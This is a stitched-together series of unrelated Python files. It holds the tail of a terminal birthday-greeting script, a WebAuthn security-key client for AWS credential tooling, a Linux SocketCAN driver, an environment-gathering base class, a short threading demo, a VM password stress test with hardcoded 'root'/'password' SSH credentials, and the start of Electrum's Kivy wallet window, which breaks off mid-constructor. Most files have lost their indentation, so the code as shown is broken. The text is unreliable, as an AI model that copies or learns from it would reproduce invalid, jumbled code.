        toBeReplace ([list]): [A list whose elements will be replaced by newString]
        newString ([string]): [A string that will replace the elements of toBeReplace]
Returns:
        [string]: [The main string with the elements of toBeReplace replaced by newString]
"""
# Iterate over the list to be replaced
for elem in toBeReplace :
# Check if the element is in the main string
if elem in mainString :
# Replace the string
mainString = mainString.replace(elem, newString)
return mainString
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
def pprint(art,time):
color_used = [random.choice(color)]
colorAttribute = []
for i in range(len(art)):
if art[i] in colorCodes:
# Color attr set to blink if 9
if art[i] == '⑨':
colorAttribute = [colorCodes[art[i]]]
# color attr none if 10
elif art[i] == '⑩':
colorAttribute = []
# Random color if R
elif art[i] == '®':
color_used = color
else:
color_used = [colorCodes[art[i]]]
print(colored(replaceMultiple(art[i],colorCodes,''),random.choice(color_used),attrs=colorAttribute),sep='', end='',flush= True);sleep(time)
def pAudio():
if playAudio:
p = vlc.MediaPlayer(resource_path(audio))
p.play()
# Code reader
with open(resource_path(__file__)) as f_in:
code = f_in.read()
def pcode():
# Print the code before wishing
if codePrint:
for i in range(len(code)):
print(colored(code[i], codeColor),sep='', end='',flush= True);sleep(codingSpeed)
input('\n\n'+colored('python3','blue')+colored(' PyBirthdayWish.py','yellow'))
os.system('cls' if os.name == 'nt' else 'clear')
else:
input(colored('press F11 and hit {Enter}...','blue'))
        os.system('cls' if os.name == 'nt' else 'clear')
# Clearing terminal
os.system('cls' if os.name == 'nt' else 'clear')
try:
pcode()
Thread(target = pAudio).start()
Thread(target = pprint, args=(art.mainArt,speed)).start()
input()
except KeyboardInterrupt:
print(colored('\n[-] Thanks!!','red'))
os._exit(0)
|
webauthn.py
|
"""
Copyright 2018-present SYNETIS.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
from __future__ import print_function, absolute_import, unicode_literals
import base64
from threading import Event, Thread
from fido2.client import Fido2Client, ClientError
from fido2.hid import CtapHidDevice, STATUS
from gimme_aws_creds.errors import NoFIDODeviceFoundError, FIDODeviceTimeoutError
class FakeAssertion(object):
def __init__(self):
self.signature = b'fake'
self.auth_data = b'fake'
class WebAuthnClient(object):
@staticmethod
def _correct_padding(data):
if len(data) % 4:
data += '=' * (4 - len(data) % 4)
return data
def __init__(self, ui, okta_org_url, challenge, credentialid):
"""
:param okta_org_url: Base URL string for Okta IDP.
:param challenge: Challenge
:param credentialid: credentialid
"""
self.ui = ui
self._okta_org_url = okta_org_url
self._clients = None
self._has_prompted = False
self._challenge = challenge
self._cancel = Event()
self._assertions = None
self._client_data = None
self._rp = {'id': okta_org_url[8:], 'name': okta_org_url[8:]}
self._allow_list = [{
'type': 'public-key',
'id': base64.urlsafe_b64decode(self._correct_padding(credentialid))
}]
def locate_device(self):
# Locate a device
devs = list(CtapHidDevice.list_devices())
if not devs:
self.ui.info('No FIDO device found')
raise NoFIDODeviceFoundError
self._clients = [Fido2Client(d, self._okta_org_url) for d in devs]
def on_keepalive(self, status):
if status == STATUS.UPNEEDED and not self._has_prompted:
self.ui.info('\nTouch your authenticator device now...\n')
self._has_prompted = True
def work(self, client):
try:
self._assertions, self._client_data = client.get_assertion(
self._rp['id'], self._challenge, self._allow_list, timeout=self._cancel, on_keepalive=self.on_keepalive
)
except ClientError as e:
if e.code == ClientError.ERR.DEVICE_INELIGIBLE:
self.ui.info('Security key is ineligible') # TODO extract key info
return
elif e.code != ClientError.ERR.TIMEOUT:
raise
else:
return
self._cancel.set()
def verify(self):
# If authenticator is not found, prompt
try:
self.locate_device()
except NoFIDODeviceFoundError:
self.ui.input('Please insert your security key and press enter...')
self.locate_device()
threads = []
for client in self._clients:
t = Thread(target=self.work, args=(client,))
threads.append(t)
t.start()
for t in threads:
t.join()
if not self._cancel.is_set():
self.ui.info('Operation timed out or no valid Security Key found !')
raise FIDODeviceTimeoutError
return self._client_data, self._assertions[0]
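# --- Hedged usage sketch (illustration only; `ui`, `challenge` and
# `credential_id` are placeholders supplied by the caller) ---
#
#   client = WebAuthnClient(ui, "https://acme.okta.com", challenge, credential_id)
#   client_data, assertion = client.verify()  # prompts for a touch; may raise
#                                             # FIDODeviceTimeoutError
#   signature_b64 = base64.b64encode(assertion.signature)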
|
_socketcan.py
|
# Copyright (c) 2019 UAVCAN Consortium
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel@uavcan.org>
import enum
import time
import errno
import typing
import socket
import struct
import select
import asyncio
import logging
import threading
import contextlib
import pyuavcan.transport
from pyuavcan.transport import Timestamp
from pyuavcan.transport.can.media import Media, Envelope, FilterConfiguration, FrameFormat
from pyuavcan.transport.can.media import DataFrame
# Disable unused ignore warning for this file only because there appears to be no other way to make MyPy
# accept this file both on Windows and GNU/Linux.
# mypy: warn_unused_ignores=False
_logger = logging.getLogger(__name__)
class SocketCANMedia(Media):
"""
This media implementation provides a simple interface for the standard Linux SocketCAN media layer.
If you are testing with a virtual CAN bus and you need CAN FD, you may need to enable it manually
(https://stackoverflow.com/questions/36568167/can-fd-support-for-virtual-can-vcan-on-socketcan);
otherwise, you may observe errno 90 "Message too long". Configuration example::
ip link set vcan0 mtu 72
SocketCAN documentation: https://www.kernel.org/doc/Documentation/networking/can.txt
"""
def __init__(self, iface_name: str, mtu: int, loop: typing.Optional[asyncio.AbstractEventLoop] = None) -> None:
"""
CAN Classic/FD is selected automatically based on the MTU. It is not possible to use CAN FD with MTU of 8 bytes.
:param iface_name: E.g., ``can0``.
:param mtu: The maximum data field size in bytes. CAN FD is used if this value > 8, Classic CAN otherwise.
This value must belong to Media.VALID_MTU_SET.
:param loop: The event loop to use. Defaults to :func:`asyncio.get_event_loop`.
"""
self._mtu = int(mtu)
if self._mtu not in self.VALID_MTU_SET:
raise ValueError(f"Invalid MTU: {self._mtu} not in {self.VALID_MTU_SET}")
self._iface_name = str(iface_name)
self._loop = loop if loop is not None else asyncio.get_event_loop()
self._is_fd = self._mtu > _NativeFrameDataCapacity.CAN_CLASSIC
self._native_frame_data_capacity = int(
{
False: _NativeFrameDataCapacity.CAN_CLASSIC,
True: _NativeFrameDataCapacity.CAN_FD,
}[self._is_fd]
)
self._native_frame_size = _FRAME_HEADER_STRUCT.size + self._native_frame_data_capacity
self._sock = _make_socket(iface_name, can_fd=self._is_fd)
self._ctl_main, self._ctl_worker = socket.socketpair() # This is used for controlling the worker thread.
self._closed = False
self._maybe_thread: typing.Optional[threading.Thread] = None
self._loopback_enabled = False
self._ancillary_data_buffer_size = socket.CMSG_SPACE(_TIMEVAL_STRUCT.size) # Used for recvmsg()
super().__init__()
@property
def loop(self) -> asyncio.AbstractEventLoop:
return self._loop
@property
def interface_name(self) -> str:
return self._iface_name
@property
def mtu(self) -> int:
return self._mtu
@property
def number_of_acceptance_filters(self) -> int:
"""
512 for SocketCAN.
- https://github.com/torvalds/linux/blob/9c7db5004280767566e91a33445bf93aa479ef02/net/can/af_can.c#L327-L348
- https://github.com/torvalds/linux/blob/54dee406374ce8adb352c48e175176247cb8db7c/include/uapi/linux/can.h#L200
"""
return 512
def start(self, handler: Media.ReceivedFramesHandler, no_automatic_retransmission: bool) -> None:
if self._maybe_thread is None:
self._maybe_thread = threading.Thread(
target=self._thread_function, name=str(self), args=(handler,), daemon=True
)
self._maybe_thread.start()
if no_automatic_retransmission:
_logger.info("%s non-automatic retransmission is not supported", self)
else:
raise RuntimeError("The RX frame handler is already set up")
def configure_acceptance_filters(self, configuration: typing.Sequence[FilterConfiguration]) -> None:
if self._closed:
raise pyuavcan.transport.ResourceClosedError(repr(self))
_logger.info(
"%s FIXME: acceptance filter configuration is not yet implemented; please submit patches! "
"Requested configuration: %s",
self,
", ".join(map(str, configuration)),
)
async def send(self, frames: typing.Iterable[Envelope], monotonic_deadline: float) -> int:
num_sent = 0
for f in frames:
if self._closed:
raise pyuavcan.transport.ResourceClosedError(repr(self))
self._set_loopback_enabled(f.loopback)
try:
await asyncio.wait_for(
self._loop.sock_sendall(self._sock, self._compile_native_frame(f.frame)),
timeout=monotonic_deadline - self._loop.time(),
)
except asyncio.TimeoutError:
break
else:
num_sent += 1
return num_sent
def close(self) -> None:
try:
self._closed = True
if self._ctl_main.fileno() >= 0: # Ignore if already closed.
self._ctl_main.send(b"stop") # The actual data is irrelevant, we just need it to unblock the select().
if self._maybe_thread:
self._maybe_thread.join(timeout=_SELECT_TIMEOUT)
self._maybe_thread = None
finally:
self._sock.close() # These are expected to be idempotent.
self._ctl_worker.close()
self._ctl_main.close()
def _thread_function(self, handler: Media.ReceivedFramesHandler) -> None:
def handler_wrapper(frs: typing.Sequence[typing.Tuple[Timestamp, Envelope]]) -> None:
try:
if not self._closed: # Don't call after closure to prevent race conditions and use-after-close.
handler(frs)
except Exception as exc:
_logger.exception("%s: Unhandled exception in the receive handler: %s; lost frames: %s", self, exc, frs)
while not self._closed:
try:
(
read_ready,
_,
_,
) = select.select((self._sock, self._ctl_worker), (), (), _SELECT_TIMEOUT)
ts_mono_ns = time.monotonic_ns()
if self._sock in read_ready:
frames: typing.List[typing.Tuple[Timestamp, Envelope]] = []
try:
while True:
frames.append(self._read_frame(ts_mono_ns))
except OSError as ex:
if ex.errno != errno.EAGAIN:
raise
self._loop.call_soon_threadsafe(handler_wrapper, frames)
if self._ctl_worker in read_ready:
if self._ctl_worker.recv(1): # pragma: no branch
break
except Exception as ex: # pragma: no cover
if self._sock.fileno() < 0 or self._ctl_worker.fileno() < 0 or self._ctl_main.fileno() < 0:
self._closed = True
_logger.exception("%s thread failure: %s", self, ex)
time.sleep(1) # Is this an adequate failure management strategy?
self._closed = True
_logger.debug("%s thread is about to exit", self)
def _read_frame(self, ts_mono_ns: int) -> typing.Tuple[Timestamp, Envelope]:
while True:
data, ancdata, msg_flags, _addr = self._sock.recvmsg(
self._native_frame_size, self._ancillary_data_buffer_size
)
assert msg_flags & socket.MSG_TRUNC == 0, "The data buffer is not large enough"
assert msg_flags & socket.MSG_CTRUNC == 0, "The ancillary data buffer is not large enough"
loopback = bool(msg_flags & socket.MSG_CONFIRM)
ts_system_ns = 0
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_SOCKET and cmsg_type == _SO_TIMESTAMP:
sec, usec = _TIMEVAL_STRUCT.unpack(cmsg_data)
ts_system_ns = (sec * 1_000_000 + usec) * 1000
else:
assert False, f"Unexpected ancillary data: {cmsg_level}, {cmsg_type}, {cmsg_data!r}"
assert ts_system_ns > 0, "Missing the timestamp; does the driver support timestamping?"
timestamp = Timestamp(system_ns=ts_system_ns, monotonic_ns=ts_mono_ns)
out = SocketCANMedia._parse_native_frame(data)
if out is not None:
return timestamp, Envelope(out, loopback=loopback)
def _compile_native_frame(self, source: DataFrame) -> bytes:
flags = _CANFD_BRS if self._is_fd else 0
ident = source.identifier | (_CAN_EFF_FLAG if source.format == FrameFormat.EXTENDED else 0)
header = _FRAME_HEADER_STRUCT.pack(ident, len(source.data), flags)
out = header + source.data.ljust(self._native_frame_data_capacity, b"\x00")
assert len(out) == self._native_frame_size
return out
@staticmethod
def _parse_native_frame(source: bytes) -> typing.Optional[DataFrame]:
header_size = _FRAME_HEADER_STRUCT.size
ident_raw, data_length, _flags = _FRAME_HEADER_STRUCT.unpack(source[:header_size])
if (ident_raw & _CAN_RTR_FLAG) or (ident_raw & _CAN_ERR_FLAG): # Unsupported format, ignore silently
_logger.debug("Unsupported CAN frame dropped; raw SocketCAN ID is %08x", ident_raw)
return None
frame_format = FrameFormat.EXTENDED if ident_raw & _CAN_EFF_FLAG else FrameFormat.BASE
data = source[header_size : header_size + data_length]
assert len(data) == data_length
ident = ident_raw & _CAN_EFF_MASK
return DataFrame(frame_format, ident, bytearray(data))
def _set_loopback_enabled(self, enable: bool) -> None:
if enable != self._loopback_enabled:
self._sock.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_RECV_OWN_MSGS, int(enable)) # type: ignore
self._loopback_enabled = enable
@staticmethod
def list_available_interface_names() -> typing.Iterable[str]:
import re
import subprocess
try:
proc = subprocess.run("ip link show", check=True, timeout=1, text=True, shell=True, capture_output=True)
return re.findall(r"\d+?: ([a-z0-9]+?): <[^>]*UP[^>]*>.*\n *link/can", proc.stdout)
except Exception as ex:
_logger.debug(
"Could not scrape the output of `ip link show`, using the fallback method: %s", ex, exc_info=True
)
with open("/proc/net/dev") as f:
out = [line.split(":")[0].strip() for line in f if ":" in line and "can" in line]
return sorted(out, key=lambda x: "can" in x, reverse=True)
class _NativeFrameDataCapacity(enum.IntEnum):
CAN_CLASSIC = 8
CAN_FD = 64
_SELECT_TIMEOUT = 1.0
# struct can_frame {
# canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
# __u8 can_dlc; /* data length code: 0 .. 8 */
# __u8 data[8] __attribute__((aligned(8)));
# };
# struct canfd_frame {
# canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
# __u8 len; /* frame payload length in byte */
# __u8 flags; /* additional flags for CAN FD */
# __u8 __res0; /* reserved / padding */
# __u8 __res1; /* reserved / padding */
# __u8 data[CANFD_MAX_DLEN] __attribute__((aligned(8)));
# };
_FRAME_HEADER_STRUCT = struct.Struct("=IBB2x") # Using standard size because the native definition relies on stdint.h
_TIMEVAL_STRUCT = struct.Struct("@Ll") # Using native size because the native definition uses plain integers
# From the Linux kernel; not exposed via the Python's socket module
_SO_TIMESTAMP = 29
_CANFD_BRS = 1
_CAN_EFF_FLAG = 0x80000000
_CAN_RTR_FLAG = 0x40000000
_CAN_ERR_FLAG = 0x20000000
_CAN_EFF_MASK = 0x1FFFFFFF
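# Illustrative example (not part of the original module): packing the header of an
# extended-ID Classic CAN frame carrying 8 data bytes and no flags would be
#   _FRAME_HEADER_STRUCT.pack(0x1FFFFFFF | _CAN_EFF_FLAG, 8, 0)
# which yields the 8-byte prefix that _compile_native_frame() pads with the data field.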
def _make_socket(iface_name: str, can_fd: bool) -> socket.SocketType:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) # type: ignore
try:
s.bind((iface_name,))
s.setsockopt(socket.SOL_SOCKET, _SO_TIMESTAMP, 1) # timestamping
if can_fd:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FD_FRAMES, 1) # type: ignore
s.setblocking(False)
if 0 != s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR):
raise OSError("Could not configure the socket: getsockopt(SOL_SOCKET, SO_ERROR) != 0")
except BaseException:
with contextlib.suppress(Exception):
s.close()
raise
return s
|
abstract_gatherer.py
|
'''
File: abstract_gatherer.py
Project: Envirosave: A simple attempt at saving a lot of
information about the execution environment at a given point
Author: csm10495
Copyright: MIT License - 2018
'''
import datetime
import os
import pprint
import threading
import time
import subprocess
GATHERER_MAGIC = 'Gatherer Magic!' # set on all gatherers to know they are gatherers
from six import iteritems, string_types
class AbstractGatherer(object):
'''
abstract class for all gatherers to extend from
'''
MAGIC = GATHERER_MAGIC
def __init__(self):
'''
initializer. Also sets up the itemDict and a lock on it for async access
'''
self.itemDict = {}
self.threads = []
self.itemDictLock = threading.Lock()
def __getstate__(self):
'''
used for pickling
'''
d = self.__dict__
d['itemDictLock'] = None
return d
def __setstate__(self, d):
'''
used for pickling
'''
self.__dict__ = d
self.itemDictLock = threading.Lock()
def __getattribute__(self, name):
'''
this is used as a hack to ensure we get a start/end time for all gatherers.
It also forces a wait until all threads are complete before returning
from the call to gather().
'''
if name == 'gather':
def gatherWrapper(*args, **kwargs):
self.itemDict['StartTime'] = datetime.datetime.now()
if object.__getattribute__(self, name)(*args, **kwargs):
self._waitTillGatheringIsComplete()
self.itemDict['EndTime'] = datetime.datetime.now()
return True
return False
return gatherWrapper
return object.__getattribute__(self, name)
def parse(self, outFile=None):
'''
utility function to parse the data to screen or file
'''
s = str(self)
if outFile:
with open(outFile, 'a+') as f:
f.write(s)
else:
print (s)
def parseToFolder(self, outDir):
'''
utility to turn itemDict into a folder of files per entry
'''
try:
os.makedirs(outDir)
except OSError:
pass
for key, value in iteritems(self.itemDict):
outFile = os.path.join(outDir, key.replace("/", "_").replace("\\", "_").replace(":", '_').replace("\"", "_").replace("*", "_"))
if hasattr(value, 'toEnvirosaveBinary'):
# Maybe we should save binary instead of text?
value.toEnvirosaveBinary(outFile)
else:
with open(outFile, 'w') as f:
if isinstance(value, string_types):
f.write(value)
else:
f.write(pprint.pformat(value, width=200))
def __str__(self):
'''
returns a string representation of the gatherer (via its itemDict)
'''
retStr = ''
for key, value in self.itemDict.items():
retStr += '%-20s : \n %s\n' % (key, str(value).replace('\n', '\n ').rstrip(' '))
return retStr
def addShellOutput(self, cmd):
'''
Will call a thread to do the shell call
'''
t = threading.Thread(target=self._addShellOutput, args=(cmd,))
t.start()
self.threads.append(t)
def _addShellOutput(self, cmd):
'''
Calls the cmd in a subprocess to put the output in the itemDict
'''
try:
tmp = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, universal_newlines=True)
except subprocess.CalledProcessError:
return # fail?
with self.itemDictLock:
self.itemDict[cmd] = tmp
def addFunctionOutput(self, func, args=None, nameOverride=None, hideException=False):
'''
runs a function in a thread and saves the return data in the itemDict
'''
t = threading.Thread(target=self._addFunctionOutput, args=(func, args, nameOverride, hideException))
t.start()
self.threads.append(t)
def _addFunctionOutput(self, func, args=None, nameOverride=None, hideException=False):
'''
called by addFunctionOutput() in a thread
'''
if args is None:
args = []
name = nameOverride or func.__name__
try:
result = func(*args)
except:
if not hideException:
raise
else:
return
with self.itemDictLock:
self.itemDict[name] = result
def _waitTillGatheringIsComplete(self, timeout=10):
'''
Called to complete gathering
'''
deathTime = time.time() + timeout
while time.time() < deathTime:
numAlive = 0
for i in self.threads:
i.join(.0001)
if i.is_alive():
numAlive += 1
if numAlive == 0:
self.threads = []
break
time.sleep(.0001)
else:
raise RuntimeError("Timeout waiting for gathering to complete!")
@classmethod
def isValid(cls):
'''
return True if this gatherer can be run right now
otherwise return False
'''
raise NotImplementedError
def gather(self):
'''
return True if it worked and itemDict is being updated,
otherwise return False
'''
raise NotImplementedError
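# A minimal sketch (not part of the original module) of how a concrete gatherer might
# extend AbstractGatherer; the command and name used below are purely illustrative.
class _ExampleShellGatherer(AbstractGatherer):
    '''
    example gatherer that records the output of a single shell command
    '''
    @classmethod
    def isValid(cls):
        # this illustrative gatherer can run anywhere a shell is available
        return True
    def gather(self):
        # both helpers run in background threads; the gather() wrapper installed by
        # __getattribute__ records StartTime/EndTime and waits for the threads to finish
        self.addShellOutput('hostname')
        self.addFunctionOutput(os.getcwd, nameOverride='WorkingDirectory')
        return True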
|
Thread4.py
|
from threading import Thread
import time
""" 列表作为参数传递给线程,它和全局变量一样也是线程间共享的 """
def work1(nums):
nums.append(44)
print('---in work1---', nums)
def work2(nums):
time.sleep(1)
print('---in work2---', nums)
g_nums = [11, 22, 33]
t1 = Thread(target=work1, args=(g_nums,))
t1.start()
t2 = Thread(target=work2, args=(g_nums,))
t2.start()
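# Expected output (illustrative; work2 sleeps for 1 s, so it prints after work1 and sees
# the element appended by work1 because both threads share the same list object):
# ---in work1--- [11, 22, 33, 44]
# ---in work2--- [11, 22, 33, 44]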
|
test_ga_robust_on_c7.py
|
'''
test for batch changing vm password
@author: SyZhao
'''
import apibinding.inventory as inventory
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstacklib.utils.ssh as ssh
import threading
import test_stub
vm_num = 3
max_cnt = 100
keep_vm_num = 8
ga_process_not_alive_num = 0
vms = []
ts = []
invs = []
def check_qemu_ga_is_alive(vm):
global ga_process_not_alive_num
vm.check()
cmd = "ps -aux|grep ga|grep qemu"
ret, output, stderr = ssh.execute(cmd, vm.get_vm().vmNics[0].ip, "root", "password", False, 22)
if ret != 0:
test_util.test_logger("qemu-ga is not alived when exception triggered: ip:%s; cmd:%s; user:%s; password:%s; stdout:%s, stderr:%s" %(vm.get_vm().vmNics[0].ip, cmd, "root", "password", output, stderr))
ga_process_not_alive_num = ga_process_not_alive_num + 1
return ret
def change_vm_password_wrapper(vm_uuid, usr, passwd, skip_stopped_vm = None, session_uuid = None):
global invs
inv = vm_ops.change_vm_password(vm_uuid, usr, passwd, skip_stopped_vm, session_uuid)
if inv:
invs.append(inv)
def vm_reboot_wrapper(vm, cnt):
global keep_vm_num
test_util.test_logger("loop cnt:%d" %(int(cnt)))
if vm:
try:
vm.check()
vm.stop()
vm.check()
vm.start()
vm.check()
except:
keep_vm_num = keep_vm_num-1
vms.remove(vm)
vms.append(test_stub.create_vm(vm_name = 'c7-vm-new-'+str(keep_vm_num), image_name = "batch_test_image"))
if keep_vm_num < 0:
vm.destroy()
vm.expunge()
else:
test_util.test_logger("vm is null")
def test():
global vms, ts, invs
global ga_process_not_alive_num,keep_vm_num
test_util.test_dsc('create VM with setting password')
for i in range(vm_num):
vms.append(test_stub.create_vm(vm_name = 'c7-vm'+str(i), image_name = "batch_test_image"))
for vm in vms:
t = threading.Thread(target=change_vm_password_wrapper, args=(vm.get_vm().uuid, "root", "password"))
ts.append(t)
t.start()
for t in ts:
t.join()
for cnt in range(max_cnt):
test_util.test_dsc("this is loop:%d" %(cnt))
for vm in vms:
t = threading.Thread(target=vm_reboot_wrapper, args=(vm, cnt))
ts.append(t)
t.start()
for t in ts:
t.join()
for vm in vms:
if check_qemu_ga_is_alive(vm) != 0:
keep_vm_num = keep_vm_num-1
vms.remove(vm)
vms.append(test_stub.create_vm(vm_name = 'c7-vm-new-'+str(keep_vm_num), image_name = "batch_test_image"))
if keep_vm_num < 0:
vm.destroy()
vm.expunge()
for vm in vms:
if vm:
vm.destroy()
vm.expunge()
test_util.test_fail('total vm reboot times: %s; vms where qemu-ga was not alive: %s' % (vm_num*max_cnt, ga_process_not_alive_num))
#Will be called only if exception happens in test().
def error_cleanup():
global vms
pass
#for vm in vms:
# if vm:
# vm.destroy()
# vm.expunge()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet
from electrum.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', 5)
return decimal_point_to_base_unit_name(decimal_point)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
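    # Illustrative example (assuming the default decimal_point of 5, i.e. the 'mBTC'
    # base unit): get_amount('1.23 mBTC') returns int(10**5 * Decimal('1.23')) == 123000
    # satoshis; roughly the inverse of format_amount_and_units().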
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Screen orientation of the device. Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
